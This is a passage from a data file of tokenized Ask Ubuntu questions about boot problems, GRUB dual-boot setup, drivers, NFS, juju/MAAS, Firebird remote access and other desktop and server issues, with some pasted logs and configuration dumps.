geteuid32 ( ) = 0 readlink ( `` /dev '' , 0xbfe5a51b , 4096 ) = -1 einval ( invalid argument ) readlink ( `` /dev/sda5 '' , 0xbfe5a51b , 4096 ) = -1 einval ( invalid argument ) stat64 ( `` /sbin/mount.ntfs-3g '' , { st_mode=s_ifreg , st_size=0 , ... } ) = 0 clone ( child_stack=0 , flags=clone_child_cleartid|clone_child_settid|sigchld , child_tidptr=0xb75517e8 ) = 4487 wait4 ( -1 , [ { wifexited ( s ) & & wexitstatus ( s ) == 1 } ] , 0 , null ) = 4487 -- - sigchld ( child exited ) @ 0 ( 0 ) -- - exit_group ( 1 ) = ?
281563	ubuntu 12.04 freezes during installation	i 'm trying to install ubuntu 12.04 and when i select an option on the installation ( example : install ubuntu ) , it suddenly freezes . i tried pressing keys , and it made this beep sound i do not recognize . screenshot :
281564	how can i find what process is trying to write to a cd that 's offline ?	i 've got a virtual cd which can mount remote media via ipmi . after doing an install of ubuntu 12.10 i 'm getting this error every 2 sec in the syslog and on the console : [ 628.890722 ] sr 6:0:0:0 : rejecting i/o to offline device how can i figure out what is trying to write to that cd , it 's certainly offline as i do n't have any remote media mounted via ipmi right now .
281566	problems with grub2 and multiple installations	i have a machine with windows 7 and scientific linux 6 running as a dual boot . this distribution of linux used legacy grub . i recently installed ubuntu 12.04 by specifying a desired partition , so as not to over-write my sl6 installation . i know that sl6 is a on /dev/sda5 and i know its uuid . i 've tried following tutorials to add entries to the boot menu . i can add entries , but selecting them invariably gives me error messages : error : file not found error : you need to load the kernel first i 've become very roughly acquainted with grub2 over the last few hours , and i was hoping for any input as to how to get my sl6 distribution on /dev/sda5 to be recognized and bootable with grub2 . i 've files on that distribution which i need to get at in the next few days . i 've run the 'boot-repair ' utility that has been recommended . i created an initial diagnostic file before doing anything to grub , you can find it here and then , after running the suggested repair routine , here is another diagnostic file . clearly , it can recognize that /dev/sda5 is there , and it can sense some of the old boot-related files that sl6 was using with legacy grub . i 'm willing to learn and do other steps/diagnostics to get this running , but can someone please let me know how to go about getting sl6 on /dev/sda5 to boot ?
281567	how to activate mobile broadband automatically once a broadband modem is active ?	when you insert your mobile broadband modem usb stick , it gets activated within 5 seconds or almost , and then modem is on ( modem manager ) ; after several seconds , mobile broadband is enabled through the network manager ( network manager applet indicator ) ; hence you manually click your setup connection to connect the modem to your provider network . that 's cool . i changed the settings of a connection to automatically connect thinking that it would connect automatically to the network once the modem is inserted and on , and the network recognized . unfortunately it it did not . is it possible to achieve the above request ? something like setting the modem-manager to notify the network-manager automatically when the first is on or execute a script instead ... .. like this one : # ! /bin/bash # script to enable mobile broadband # author : hanynowsky # activate : nmcli con up id `` meditel 2 '' # deactivate : nmcli con down id `` meditel 2 '' ismodemon= $ ( lsusb | grep modem\ on ) # deactivating then activating the broadband triggers the automatic connection if [ -n `` $ { ismodemon } '' ] ; then nmcli nm wwan off # de activate mobile broadband nmcli nm wwan on # activate mobile broadband else echo `` modem is off '' ; fi exit 0 ; i thought about adding a startup command : nmcli nm wwan on to enable broadband once my session is opened . this way , i get connected to internet automatically . but i am afraid mobile broadband can not be enabled unless there is a modem plugged in . thanks
281568	usb flashdrive dynamic installation	how can i enable ongoing changes to a working usb flash drive installation of ubuntu 12 ? i would like to be able to add applications/tools and be able to use them on subsequent boot ups to the flash drive .
281569	where is the ubuntu magazine pdf located on the dvd ?	where is the ubuntu magazine pdf located on the dvd that is distributed with the magazine ? ?
281570	how can i inspect upstart job states transitions using log file ?	i want to have a look at the states transitions using the method described here : http : //upstart.ubuntu.com/cookbook/ # viewing-state-transitions . this is what i do : # initctl log-priority debug # initctl stop tty1 # initctl start tty1 but i can not see anything related to tty1 in the file /var/log/syslog .
281575	ubuntu 12.04 - pc freezes after 10 minutes of inactivity	if i do n't use my computer after 10 minutes , it tries to sleep but just freezes . nothing works and i have to reboot losing all of my unsaved programs . i could change it to never sleep but is there a fix for this ? i heard that this might be a bug . also this just started happening when i changed my video card and put a new nvidia geforce 610 in my computer . should i upgrade to 12.10 ? thanks , darwin
281579	i have a 3 monitor setup . how can i set nvidia settings ( xorg.conf , etc ) to properly use 2 of the 3 ?	i 've got a thinkpad w510 laptop running linux mint 13 ( i figured i 'd be safe asking this question since lm is an ubuntu derivative , and in any case i believe my problem is distro-agnostic ) . i have two external monitors that i use at home , with the third laptop monitor turned off ( it 's on a shelf above my main desk , so the picture below accuracy describes my physical setup ) : now , whenever i turn on my computer , come back from suspend , etc ; the `` off '' monitor is hidden behind everything : typically i would say `` eh , who cares if nvidia-settings does n't keep the monitor settings properly '' - the laptop monitor is off ! things display correctly ! my problem is i 'm using redshift to change my monitors ' color temperature based on time of day . when the screens get into the configuration shown in the 2nd screen shot , it screws up the `` redshift '' ing on the left monitor . basically , the left monitor does not change color and yet the right one does . i typically just fix this by popping into nvidia-settings and changing the display configuration , but we all know that if you 've got do something menial n number of times , that 's probably n-1 too many times .
281590	how to install packages that is already downloaded ?	i am new to linux environment.i am using windows . recenty i downloaded the google chrome and tried to install it but failed.then i saw a tutorial which had this command wget https : //dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb it will download the package again but i have already downloaded it using mozilla . is there any terminal window command that i can use in place of this above command to access an install package from a specified path and install it ? the tutorial link is : http : //www.noobslab.com/2012/10/install-latest-google-chrome-in-ubuntu.html
281593	monitor flickering ati	i 'm using ubuntu 12.10 on laptop samsung with randeon hd 6620g ( apu a8 ) , when i run amdcccle -version it says 2.18 , not sure if that 's the correct version . my problem is that i have and external monitor , aoc e2343fsk and when i finally got it working at the resolution i want 1920x1080 it works fine for like 5minutes and then it starts flickering ... i solved this on windows ( the exact same problem ) with some options ( i do n't remember very well ) i believe there were some buttons '+ ' and '- ' on some vsync option i played with them on windows and yay ! got it working , but i do n't see anything similar on this catalyst version ( i used xorg-edgers ppa for installing fglrx ) . thanks .
281597	ca n't access bios after install of ubuntu 12.04	i just got a reconditioned dell dimension 4500 . i installed ubuntu 12.04 as the only operating system and now if i try to access the bios , i get an error saying utilities partition not found . what do i do ?
281598	software center not opening showing error	i am a linux mint 14 user . i am not able to open the software center . tusharmakkar08 @ tusharmakkar08-satellite-c660 ~ $ software-center error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linuxmint traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 128 , in < module > from softwarecenter.ui.gtk3.app import softwarecenterappgtk3 file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 53 , in < module > from softwarecenter.db.application import application file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 27 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 197 , in < module > distro_instance = _get_distro ( ) file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 172 , in _get_distro module = __import__ ( distro_module_name , globals ( ) , locals ( ) , [ ] , -1 ) importerror : no module named linuxmint please help me out
281602	bitnami says 'no enough permissions to bind to the port ... '	i am installing wordpress of bitnami in ubuntu 12.04 amd64 . when i run installation , it pops a window letting me choose 'mysql server port ' . i use the default 3306 . but it says : it seems you do not have enough permissions to bind to the port or the port is already taken by another application . please select another one . i use 'service mysql status ' and 'sudo lsof -i:3306 ' to find that mysql service is running with port 3306 . what is the matter ? thanks
281605	system not checking for updates	i have a system where i have the development version 13.04 that is not checking for updates . from the command line `` sudo apt-get update '' completes without any error , and `` sudo-apt-get upgrade '' afterwards installs all the available updates without error . in system parameters `` check updates daily '' is marked , but the system refuses to do it , if i do n't issue the `` update '' command manually no updates are offered . i 'm behind a proxy that is working perfectly otherwise . i have checked /etc/environment and /etc/apt/apt.conf and i can see the proxy correctly defined in these two places , and in any case as i said `` sudo apt-get update '' finds the repositories that i use without any error . what can be preventing my system to check updates automatically ?
281609	why do i get exception in thread `` main '' java.lang.unsupportedclassversionerror ?	i am trying to run a program on eclipse . i am getting the following error : exception in thread `` main '' java.lang.unsupportedclassversionerror : perlinit : unsupported major.minor version 51.0 at java.lang.classloader.defineclass1 ( native method ) at java.lang.classloader.defineclass ( classloader.java:634 ) at java.security.secureclassloader.defineclass ( secureclassloader.java:142 ) at java.net.urlclassloader.defineclass ( urlclassloader.java:277 ) at java.net.urlclassloader.access $ 000 ( urlclassloader.java:73 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:212 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:205 ) at java.lang.classloader.loadclass ( classloader.java:321 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:294 ) at java.lang.classloader.loadclass ( classloader.java:266 ) could not find the main class : perlinit . program will exit . output of java -version is java version `` 1.6.0_27 '' openjdk runtime environment ( icedtea6 1.12.3 ) ( 6b27-1.12.3-0ubuntu1~12.04.1 ) openjdk server vm ( build 20.0-b12 , mixed mode ) output of javac -version javac 1.6.0_27 where can i be going wrong ?
281617	can i use file system in ubuntu without installing ( running via usb )	i want to use the file system like all drive from the hard drive without installing ubuntu only running via usb .
281619	pdf smart file diff	i have a libreoffice document that i converted to pdf at some point in time using the built-in capabilities . the timestamp on the pdf is later than on the word processing document , so that makes sense , but i am not absolutely sure that the word processing document produces exactly that pdf . the document is 20 pages long so it 's not a good idea to check it manually . one possibility is to redo the pdf in a different folder and then do a binary diff of the two pdfs . unfortunately the command line diff indicates that the `` binary files are different '' . is there a `` smart binary diff '' that will help me determine if the difference is merely in meta data or some such non-consequential difference ?
281620	how to print only even or odd pages ( hp laserjet 1018 )	sometimes i print two sided documents . therefore i first print odd pages then i use the same papers in reverse order to print even pages ( i just check reverse while printing ) . i do this operation manually , it means that i enter page numbers my self , like : 1,3,5,7,9 for odd pages then 2,4,6,8,10 for even pages . the problem is when i want to print a large number of pages this is hard to do . imagine 100 pages . moreover i may make some mistakes in between . is there any way to define odd pages in general print dialog of ubuntu ? i am using ubuntu 12.10 with default hplib for printing .
281625	install win7 theme to kubuntu 12.04	im trying to install win7 theme to my kubuntu 12.04 system through console with the following commands but after the last command the system says that i must install zenity.how can i continue the installation.thank you cd $ home sudo wget http : //web.lib.sun.ac.za/ubuntu/files/help/theme/gnome/win7-setup.sh sudo chmod 0755 $ home/win7-setup.sh $ home/win7-setup.sh
281628	juju , dnsmasq and `.localdomain`	i 'm trying to setup an ubuntu private cloud infrastructure on a virtual environment via learning from https : //wiki.ubuntu.com/securityteam/testingmaas and https : //help.ubuntu.com/community/ubuntucloudinfrastructure # ubuntu_cloud_infrastructure_with_maas_and_juju all have been done but i have a small issue ; i see that juju has been added .localdomain to node 's host-names during deploying of various charms . in another side of coin , my dnsmasq on the maas server node can not resolve this new one changed host-name to a suitable ip address . e.g . juju debug-hooks nova-volume/0 says me node-aabbccddeef8.localdomain can not be resolved or for example when i try to log-in to openstack-dashboard web ui , it says me an internal error which after my review , it 's because it can not resolve keystone node , node-aabbccddeef5.localdomain to any ip . why juju behaves like this ? can i say juju to roll-back the host-names ? or any clean solution to learn dnsmasq to resolve these too ? thanks in advance !
281637	epson stylus sx230 wont scan	i just installed ubuntu 12.04 - and am a complete newbie . i can get my epson stylus sx 230 to print , but it wont scan . simple scan and skanlite cant find the scanner . i tried downloading the .deb folders for iscan from the epson homepage and opening them with gdebi but there does n't seem to be any software called iscan or image scan in the ubuntu software center . can anybody help me getting my scanner to scan ? baby steps please ! : - ) andreas
281640	juju not seeing the maas slaves ... at least not after some time ?	at our company are doing a project where we want to start doing juju , maas and openstack . all in all we are satisfied , but we have one major problem that is setting us back . we have n't seemed to find out where the problem lies - with juju or maas . we have set up a maas master with ubuntu 12.10 - and we use 12.04 on the maas slaves . we have one bootstrap slave and 6 slaves for openstack ... in the beginning everything seems to work fine - getting all slaves in ready state in maas and deploying with juju also seems to work as expected . we deploy a whole openstack environment . but at some point ( this has been experienced 3-4 times after redoing it all over again ) juju will not see new maas slaves and when we want to add units or other juju charms on new nodes those will not be seen by juju . they are stated as ready in maas , but juju does not see them , and when we use juju deploy the charm just will say pending and machine will say pending , not picking the ready nodes from maas . i can see that juju version in the slaves is 0.6 but i can see there is a newer version . will it work with the newer version ?
281646	how to remove ubuntu 12.10 from dual boot with win 7 ?	i have dual booted ubuntu with windows 7 . i wanted to uninstall ubuntu . so as per an answer for one of the related questions on this site i did the following : deleted the ubuntu partition through windows . as per the answer now i was supposed to boot windows from usb & then do `` repair startup '' . but windows could not find any problem hence nothing was done . so when my laptop booted normally ( i.e . from hdd ) it was showing some error like grub : / unknown file system . i dont remember the exact words but it was something like this . thus i could n't boot windows neither ubuntu . so again i had to install ubuntu . but now my question is how do i remove ubuntu so that my laptop returns to the previous state of installing ubuntu ? update : seems that it wasnt on this site . my mistake : p .here is the link http : //www.makeuseof.com/tag/how-to-safely-uninstall-ubuntu-in-windows-dual-boot-environment/
281653	how can i uninstall everything i 've been installing for last two days ?	i tried to install weather gadgets for days , non of them worked . the thing is that i can download and install but nothing is working . did i did that and why ? to make things worse , than i installed this thing called my weather indicator that is a look-a-like to an htc gadget , as a matter of fact , i ca n't uninstall it at all . it is not working , i ca n't open the gadget , it does n't show on mu screen , and when i go on dash to check it out , it shows that it exists , i see a sun and a cloud which is it icon , but it can not be opened or uninstall . there is no uninstall button and the launch button is not working . i 'm new ubuntu user , i try to learn , and i usually make things work , but for two days it ( ubuntu ) is slow , not opening apps at usual pace , and then this thing with not being able to have a weather gadget or being able to uninstall the one i mentioned . is there a way for me to set things the way they were two days ago ? any help will be greatly appreciated !
281659	batch split large flacs to mp3 using sox or similar	i have about 50x 1 hour long flac files ( audiobooks ) , each of which i need to encode into ( approx . ) 10 minute long segments at a convenient silence point ( + or - 30 seconds either side of 10 minutes ) . the last segment can be shorter than 10 minutes ( for those flac files which are not exactly an hour ) . grateful for any suggestions of a command line for each flac , which i can then put into a bash script . thanks .
281660	what is the difference between different 'lib ' folder in ubuntu	in the root directory , we can find several 'lib ' subfolder , for example , /lib , lib32 , lib64 , /usr/lib , /usr/lib32 , /usr/local/lib . what are their differences ?
281661	any `` to do '' applet for unity ?	for gnome shell - a simple extension exists . is there any similar extension for unity as well ?
281663	not starting nfs kernel daemon : no support in current kernel	i tried to follow these instructions for setting up nfs server on 12.04 : https : //help.ubuntu.com/community/settingupnfshowto /etc/default/portmap does n't exist so i skipped that part . after editing /etc/exports i tried to restart/start the nfs service but i get the following error which i do n't understand , everything was installed from apt-get : davidparks21 @ hadoop-fsimage-bkup1 : ~ $ sudo service nfs-kernel-server start fatal : could not load /lib/modules/3.5.0-27-generic/modules.dep : no such file or directory * not starting nfs kernel daemon : no support in current kernel . i should strongly note that this is a 12.04 lxc container that 's running in a 12.10 host ! update : tested in a 12.10 lxc container and i get the same error .
281667	how to connect iomega screenplay dx wireless drive to ubuntu ?	i 'm trying to connect ubuntu to a wireless hard drive . iomega screenplay dx . the device works fine in windows and i can ping it in ubuntu but i 'm lost trying to add it as a drive . any help would be greatly appreciated .
281675	better terminal for ubuntu ?	suggest please a terminal application for ubuntu desktop which meets next requirements : 1 . paste via right mouse click ( without showing the context menu ) 2 . copy via mouse selection . 3 . solarized color scheme . with current one `` gnome terminal v3.6.0 '' it is not possible . or suggest a way to improve gnome terminal . p.s . why i dislike the `` selection buffer '' behavior ... f.e . i have in text editor word `` command '' and in terminal window command `` ls -la '' and i want to replace that word in text editor onto the command from terminal . `` selection buffer is not suitable in that case because when you will select `` command '' in text editor to replace it you will have `` command '' in `` selection buffer '' . so you will paste `` command '' instead of `` command '' : ) . you could only select `` ls -la '' paste it after `` command '' via middle mouse click and remove `` command '' after it . too much clicks . that is why i want to use `` clipboard '' for that instead of `` selection buffer '' . select with mouse , right mouse click , select in context menu copy , left mouse click on that menu item - also too much clicks .
281683	why does my computer not freeze while ripping dvds ? 12.04	seriously . i have random freezes all the time ( see https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1154006 ) but i never get a freeze while thoggen dvd ripper is ripping . if anyone knows enough to understand why , this bug could be solved and the people left after bug 993187 might be helped too !
281684	ubuntu 12.10 is draining my battery really fast	i 'm new to ubuntu and i 'm not a developer to know how to write codes . i downloaded it couple of days ago but it is killing my battery , it almost lasts an hour and couple of minutes while it holds for over than 3 hours with windows . how to fix this in easy steps to follow ?
281687	difference between apt-get compilation and manual compilation from source	i am trying to replace manually a library for freeradius . on a one hand i installed freeradius with an apt-get install . there was a library `` libfoo-2.0.4.so '' ( let 's call it the lib ( apt ) ) . on the other hand i used the sources ( from apt-get source ) to modify the library `` libfoo-2.0.4.so '' ( let 's call it the lib ( src ) ) . the i compiled the sources ( ./configure , make ) to retrieve this modified lib ( src ) . ( the lib works fine when i test it ) . when i try to manually replace lib ( apt ) by lib ( src ) the freeradius segfaults during the call of that library . so it seems that the libraries are not compatible . could it be because of compilation issues ? ( precompiled version versus local compilation ) or build option issues ? thanks ! ps : i am kind of new to these websites so i 'm not sure i 'm posting this in the right place..
281693	configuring the gedit embeded terminal	i have two problems with my gedit embeded terminal : first my terminal line is white and black , and i really want it to be like the ubuntu terminal line that is purple : embeded terminal : regular terminal : to fix this problem i read a thread that explains how to change colors , but it failed . i also read the thread they were pointing to : gedit embedded terminal uses incorrect palette when i open the embeded terminal , it also opens it in the home directory , but i want it to open on the folder of the file that is actually opened , like in kate . how do i do it ?
281695	keyboard layout indicator in gnome	it has been discussed several times . this question is just to get the latest answer from the experts . is it still impossible to get a keyboard layout indicator in the top panel in gnome shell ? my personal experience says , it is impossible . i can use keyboard layout indicator in gnome classic , ubuntu , xfce , lxde ! but not in gnome shell . also , will it still be impossible to use it even after release of ubuntu 13.04 ? for whatever it is worth , i think it is quite strange and sad that what can be done in practically every other de can not be done in gnome .
281697	`` system running in low graphics mode '' - ubuntu 12.04	when i boot my ubuntu 12.04 , i get a screen showing : system running in low graphics mode after referring some forums and blogs , i tried the following : sudo apt-get install -- reinstall ubuntu-desktop and did a reboot . still the problem was not resolved . then i installed the driver sudo apt-get install fglrx still faced the problem . i have all important data and have installed much softwares . it would be helpful if someone could suggests how to resolve the issue
281698	logitech g25 racing wheel	how can i set up a logitech g25 racingwheel in ubuntu 12.04 ? it there a driver or other tool avaiable ? i 'll using it in speed dreams .
281700	cgminer at ubuntu 12.10	i 'm following this tutorial to set up ubuntu mining on ubuntu 12.10 32 bit . https : //docs.google.com/document/d/1gw7ypygmgnnu42skibulbjjux_sup_cpjsedsi8_z9u/preview ? sle=true at last step they suggesting to check out settings with ./cgminer -n. i 've got this kirill @ kirill-desktop : ~/cgminer-2.11.4-x86_64-built $ ./cgminer -n bash : ./cgminer : can not execute binary file what 's wrong with me ?
281712	how do i verify that my partitions are being used	i have installed ubuntu by manually specifying the partitions / , /swap & /home . i am new to ubuntu so i would like to verify whether these partitions are working properly .
281713	configure firebird service to allow remote access	i installed firebird server on my ubuntu 12.10 and it is working perfectly when accessing locally /usr/lib/firebird/2.1 # isql-fb -user sysdba -password masterkey use connect or create database to specify a database sql > connect '/var/lib/firebird/2.1/system/help.fdb ' ; database : '/var/lib/firebird/2.1/system/help.fdb ' , user : sysdba sql > show tables ; topics my firewall is properly configured # ufw status status : active to action from -- -- -- -- -- -- 3050 allow anywhere 3050 allow anywhere ( v6 ) but when i try to connect tge same database remotely it raises : `` connection rejected by remote interface '' looking at firebird 's log it is clear that my fb server is actively denying remote access : root @ ricardo-pc : /usr/lib/firebird/2.1 # tail -f firebird.log server/process_packet : connection rejected for acras.4294967295.4294967295 ricardo-pc ( server ) mon apr 15 09:06:24 2013 server/process_packet : connection rejected for acras.4294967295.4294967295 ricardo-pc ( server ) mon apr 15 09:19:10 2013 server/process_packet : connection rejected for acras.4294967295.4294967295 i had a deep look at firebird.conf and did n't see any obvious configuration to allow remote access . how can i do that ?
281714	is there any standard tool for checking hardware and drivers ?	i have installed ubuntu 12.1- on my dell inspiron 15r 3rd gen laptop . it has ati radeon 7670m graphics card . how do i install drivers for all my hardware safely ? currently gesture of trackpad , fan speed , etc are not working properly . how do i test whether all my hardware is properly working ? is there any standard tool for error checking , benchmarking , etc for checking hardware ? thank you .
281722	installing newer version of ubuntu	i have a older model ibm think-pad and i have successfully installed ubuntu 9.04 and found that it is no longer supported . i have burned a copy of 12.10 onto a cd and tried without installing onto a desktop . when i have placed the same cd into the think-pad , it does not recognize there is anything on the cd such as the os . are there any suggestions
281723	upstart with a script that start and finish their own processes	i 'm trying to setup in upstart a script that launch several internal procs and kill them if is required $ listener.py -startall $ listener.py -killall i can run it with this settings : # listener service description `` listener server '' start on runlevel [ 2345 ] stop on starting rc runlevel= [ 016 ] exec /home/www-data/listener/bin/listener.py -startall pre-stop exec /home/www-data/listener/bin/listener.py -killall but i 'm wondering how run the command listener.py -killall to finish the service : $ sudo service listener stop $ stop : unknown instance : my upstart script only start the services but does n't work when i try to stop it . thanks in advance .
281726	nautilus sorting by filename column seems insane	by what logic does the kรกlmรกn track appear where it does ? ( i have the view sorted by filename ) where is this sort behaviour defined and is there anyway to change this behaviour ?
281735	how to boot over multiple drives on a uefi motherboard using grub2	i have an ssd and a hdd , on a uefi motherboard . i can switch os by changing boot order in bios , but i would prefer it if grub2 simply listed windows7 as a boot option . solving should help anyone who has more than one drive on a uefi motherboard . have seen booting multiple oss from multiple disks with uefi and refind looks to be a good alternative ; this question is about how to correctly configure grub2 to see the bootloader for windows7 ( or any os ) , if at all possible - without using grub-legacy or another tool such as refind . i am using ubuntu 12.10 with grub2 is on the ssd , the primary boot device , and windows7 is on the hdd , which it decided to split into three partitions as it installed . boot info script gives a lengthy breakdown : boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 72 for . = > no boot loader is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.10 boot files : /boot/grub/grub.cfg /etc/fstab sda2 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : __________________________________________________________________________ file system : vfat boot sector type : windows 7 : fat32 boot sector info : no errors found in the boot parameter block . operating system : boot files : /efi/boot/bootx64.efi sdb2 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sdb3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 218,439,679 218,437,632 83 linux /dev/sda2 218,439,680 234,440,703 16,001,024 82 linux swap / solaris drive : sdb _____________________________________________________________________ disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 256 heads , 63 sectors/track , 121126 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 1 4,294,967,295 4,294,967,295 ee gpt /dev/sdb1 ends after the last sector of /dev/sdb guid partition table detected . partition start sector end sector # of sectors system /dev/sdb1 2,048 206,847 204,800 efi system partition /dev/sdb2 206,848 468,991 262,144 microsoft reserved partition ( windows ) /dev/sdb3 468,992 1,953,523,711 1,953,054,720 data partition ( windows/linux ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 e20b187a-c3b0-45e1-98df-c955b3cffdde ext4 /dev/sda2 7663b629-19c9-49fc-a744-2beb2dcdb317 swap /dev/sdb1 f428-fb77 vfat /dev/sdb3 162c36632c363dd5 ntfs ================================ mount points : ================================= device mount_point type options /dev/sda1 / ext4 ( rw , errors=remount-ro ) =========================== sda1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } terminal_input console terminal_output console if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=6 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-e20b187a-c3b0-45e1-98df-c955b3cffdde ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 e20b187a-c3b0-45e1-98df-c955b3cffdde else search -- no-floppy -- fs-uuid -- set=root e20b187a-c3b0-45e1-98df-c955b3cffdde fi linux /boot/vmlinuz-3.5.0-27-generic root=uuid=e20b187a-c3b0-45e1-98df-c955b3cffdde ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.5.0-27-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-e20b187a-c3b0-45e1-98df-c955b3cffdde ' { menuentry 'ubuntu , with linux 3.5.0-27-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-27-generic-advanced-e20b187a-c3b0-45e1-98df-c955b3cffdde ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 e20b187a-c3b0-45e1-98df-c955b3cffdde else search -- no-floppy -- fs-uuid -- set=root e20b187a-c3b0-45e1-98df-c955b3cffdde fi echo 'loading linux 3.5.0-27-generic ... ' linux /boot/vmlinuz-3.5.0-27-generic root=uuid=e20b187a-c3b0-45e1-98df-c955b3cffdde ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-27-generic } menuentry 'ubuntu , with linux 3.5.0-27-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-27-generic-recovery-e20b187a-c3b0-45e1-98df-c955b3cffdde ' { recordfail insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 e20b187a-c3b0-45e1-98df-c955b3cffdde else search -- no-floppy -- fs-uuid -- set=root e20b187a-c3b0-45e1-98df-c955b3cffdde fi echo 'loading linux 3.5.0-27-generic ... ' linux /boot/vmlinuz-3.5.0-27-generic root=uuid=e20b187a-c3b0-45e1-98df-c955b3cffdde ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.5.0-27-generic } menuentry 'ubuntu , with linux 3.5.0-26-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.5.0-26-generic-advanced-e20b187a-c3b0-45e1-98df-c955b3cffdde ' { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x 